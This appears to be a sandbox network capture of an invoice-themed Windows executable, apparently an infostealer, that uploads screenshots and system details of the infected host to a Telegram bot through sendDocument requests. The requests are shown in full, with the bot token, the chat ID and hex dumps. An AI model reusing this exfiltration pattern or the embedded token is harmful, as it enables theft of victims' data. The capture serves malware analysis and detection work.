2025-01-08 11:32:08 UTC	12114	OUT	Data Raw: c4 a1 4b af 18 ea 2b 03 c3 5f f2 10 93 fe b9 1f e6 2b a2 b8 3f b9 6f c3 f9 d7 ca e6 df c7 7e 87 d6 e5 1f ee eb d5 90 29 aa da c7 fc 82 a6 ff 00 80 ff 00 e8 42 a7 43 55 f5 7f f9 05 4d ff 00 01 ff 00 d0 85 79 d8 4f f7 88 7a af cc ef c5 ff 00 bb d4 f4 7f 91 cc 51 45 15 f7 47 c2 05 14 51 4c 02 a0 9a e6 18 cb 23 3e 1b 1d 30 6a 7a 87 4d b1 b6 d4 bc 44 2c ee 9e 44 49 01 c1 42 01 c8 5c f7 07 d2 a2 6d 28 b6 ce 9c 2d 3f 69 51 23 b3 ff 00 84 af 43 ff 00 9f ef fc 84 ff 00 e1 4a 3c 55 a1 92 00 be 1c fa c6 e3 fa 57 29 a6 f8 6d 2e b4 7b eb 99 9e 45 b8 85 9d 62 40 40 0c 54 64 e4 62 a8 6a 1a 6c 16 7a 26 9f 75 be 43 73 75 b9 8a 92 36 85 07 8c 0c 7b 8e f5 e7 2c 3d 16 f9 53 67 d0 ba d5 12 bd 91 e9 77 e8 f2 5b 62 34 2e cb 22 3e d0 40 24 2b 82 7a fb 0a c7 d6 6c 24 d4 00 96 2d Data Ascii: K+_+?o~)BCUMyOzQEGQL#>0jzMD,DIB\m(-?iQ#CJ<UW)m.{Eb@@Tdbjlz&uCsu6{,=Sgw[b4.">@$+zl$-
2025-01-08 11:32:08 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 39 30 62 64 31 65 62 37 61 30 2d 2d 0d 0a Data Ascii: -----------------------------8dd3690bd1eb7a0--
2025-01-08 11:32:08 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:32:08 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":137999,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335928,"document":{"file_name":"user-116938 2025-01-17 00-49-03.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbD2d-YjjdWvDctHETx0MRVUjRGqoGAAJQFgACPzjxU-FtVbRHJyvlAQAHbQADNgQ","file_unique_id":"AQADUBYAAj848VNy","file_size":14233,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbD2d-YjjdWvDctHETx0MRVUjRGqoGAAJQFgACPzjxU-FtVbRHJyvlAQAHbQADNgQ","file_unique_id":"AQADUBYAAj848VNy","file_size":14233,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGw9nfmI43Vrw3LRxE8dDEVVI0RqqBgACUBYAAj848VPhbVW0Rycr5TYE","file_unique_id":"AgADUBYAAj848VM","file_size":77071},"caption":"New SC Recovered!\n\nTime: 01/17/2025 00:39:03\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49730	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:32:16 UTC	238	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3b103c721cfe Host: api.telegram.org Content-Length: 77480 Expect: 100-continue
2025-01-08 11:32:17 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:32:17 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 62 31 30 33 63 37 32 31 63 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 62 31 30 33 63 37 32 31 63 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 32 2f 32 30 32 35 20 31 38 3a 30 31 3a 34 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd3b103c721cfeContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd3b103c721cfeContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/22/2025 18:01:42User
2025-01-08 11:32:17 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:32:17 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:32:17 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:32:17 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:32:17 UTC	11894	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:32:17 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 62 31 30 33 63 37 32 31 63 66 65 2d 2d 0d 0a Data Ascii: -----------------------------8dd3b103c721cfe--
2025-01-08 11:32:17 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:32:17 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138000,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335937,"document":{"file_name":"user-116938 2025-01-22 18-11-47.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbEGd-YkELu6SCunhcbd4ZYqVCrNqrAAJRFgACPzjxU7ifWX4_IFkhAQAHbQADNgQ","file_unique_id":"AQADURYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbEGd-YkELu6SCunhcbd4ZYqVCrNqrAAJRFgACPzjxU7ifWX4_IFkhAQAHbQADNgQ","file_unique_id":"AQADURYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxBnfmJBC7ukgrp4XG3eGWKlQqzaqwACURYAAj848VO4n1l-PyBZITYE","file_unique_id":"AgADURYAAj848VM","file_size":76851},"caption":"New SC Recovered!\n\nTime: 01/22/2025 18:01:42\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49731	149.154.167.220	443	4564	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:32:32 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3fc8c9ea1cf4 Host: api.telegram.org Content-Length: 77480 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:32:32 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:32:32 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 66 63 38 63 39 65 61 31 63 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 66 63 38 63 39 65 61 31 63 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 38 2f 32 30 32 35 20 31 38 3a 32 32 3a 35 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd3fc8c9ea1cf4Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd3fc8c9ea1cf4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/28/2025 18:22:55User
2025-01-08 11:32:32 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:32:32 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:32:32 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:32:32 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:32:32 UTC	11894	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:32:32 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 66 63 38 63 39 65 61 31 63 66 34 2d 2d 0d 0a Data Ascii: -----------------------------8dd3fc8c9ea1cf4--
2025-01-08 11:32:33 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:32:33 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138001,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736335953,"document":{"file_name":"user-116938 2025-01-28 18-22-57.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbEWd-YlFily8NbDAmNDS1gT3XryNyAAJSFgACPzjxU813XJMn3UaLAQAHbQADNgQ","file_unique_id":"AQADUhYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbEWd-YlFily8NbDAmNDS1gT3XryNyAAJSFgACPzjxU813XJMn3UaLAQAHbQADNgQ","file_unique_id":"AQADUhYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxFnfmJRYpcvDWwwJjQ0tYE9168jcgACUhYAAj848VPNd1yTJ91GizYE","file_unique_id":"AgADUhYAAj848VM","file_size":76851},"caption":"New SC Recovered!\n\nTime: 01/28/2025 18:22:55\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49732	149.154.167.220	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:33:10 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd431de51abaea Host: api.telegram.org Content-Length: 77464 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:33:10 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:33:10 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 33 31 64 65 35 31 61 62 61 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 33 31 64 65 35 31 61 62 61 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 30 31 2f 32 30 32 35 20 32 33 3a 34 39 3a 34 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd431de51abaeaContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd431de51abaeaContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/01/2025 23:49:41User
